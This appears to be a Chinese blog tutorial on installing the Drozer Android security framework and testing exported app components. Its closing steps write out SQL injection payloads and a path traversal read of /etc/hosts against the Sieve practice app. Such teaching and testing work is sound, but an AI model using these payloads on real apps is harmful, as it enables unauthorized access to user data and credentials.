乐于分享
好东西不私藏

App安全测试-最新版Drozer工具安装与使用教程-2026.02.25更新

App安全测试-最新版Drozer工具安装与使用教程-2026.02.25更新

一、前言
Drozer是一款Android安全测试框架,可对Android中包含的四大组件进行漏洞扫描,下面详细介绍Drozer安装与使用教程。
二、Android四大组件

1、Activity:负责可视化交互,是用户能看到的界面;

2、Service:后台执行长任务,无界面,分为前台 / 后台两种类型;

3、BroadcastReceiver:监听系统,应用的广播消息,响应事件(如电量变化);

4、ContentProvider:实现跨 App 数据共享,是 Android 标准的跨应用数据访问方式。

三、相关工具环境下载地址

Python3:https://www.python.org/downloads/windows/Drozer服务端:https://github.com/ReversecLabs/drozerDrozer客户端:https://github.com/ReversecLabs/drozer-agent/夜神模拟器6.6.1.1版本:https://pan.baidu.com/s/1bvBLA2tRqILjzBGvglF_XQ?pwd=1ncq靶场App:https://github.com/ReversecLabs/drozer/releases/download/2.3.4/sieve.apk

四、相关环境安装

1、安装最新版python3环境,并将pip3更新至最新版:python -m pip install –upgrade pip

2、Drozer服务端安装

安装命令:pip install drozer-3.1.0-py3-none-any.whl

服务端安装成功

3、夜神模拟器安装,版本号为6.6.1.1

4、安装Drozer客户端,将客户端程序复制到夜神模拟器,双击运行启动客户端,客户端监听31415端口

进入模拟器安装目录,利用adb.exe程序把31415端口映射到物理机

端口映射命令:adb.exe forward tcp:31415 tcp:31415

服务端连接客户端命令:drozer console connect

出现红框字样代表所有测试环境安装成功

5、将靶场App复制到模拟器,双击运行

五、组件测试方法

1、通过关键字查找待测试App包名

run app.package.list -f App关键字

2、查看App详细信息

run app.package.info -a App包名

3、确认四大组件攻击面,出现exported代表对外暴露

run app.package.attacksurface App包名

4、查看Activity组件的具体信息,出现 Permission: null,代表权限为空,可直接未授权调用

run app.activity.info -a App包名

5、未授权调用具体组件

run app.activity.start –component App包名 App组件名

6、检测Android四大组件安全性

run app.activity.info -a App包名run app.service.info -a App包名run app.broadcast.info -a App包名                    run app.provider.info -a App包名

7、检测数据泄露

run scanner.provider.finduris -a App包名run app.provider.query 具体的url

8、检测是否存在sql注入风险

run scanner.provider.injection -a  App包名

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM sqlite_master WHERE type='table'--"run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/ --selection "1=1"

9、检测是否存在文件遍历漏洞

run scanner.provider.traversal -a App包名run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/../../../../../../../../etc/hosts

本文只列举了常用的命令

本站文章均为手工撰写未经允许谢绝转载:夜雨聆风 » App安全测试-最新版Drozer工具安装与使用教程-2026.02.25更新

评论 抢沙发

4 + 7 =
  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
×
订阅图标按钮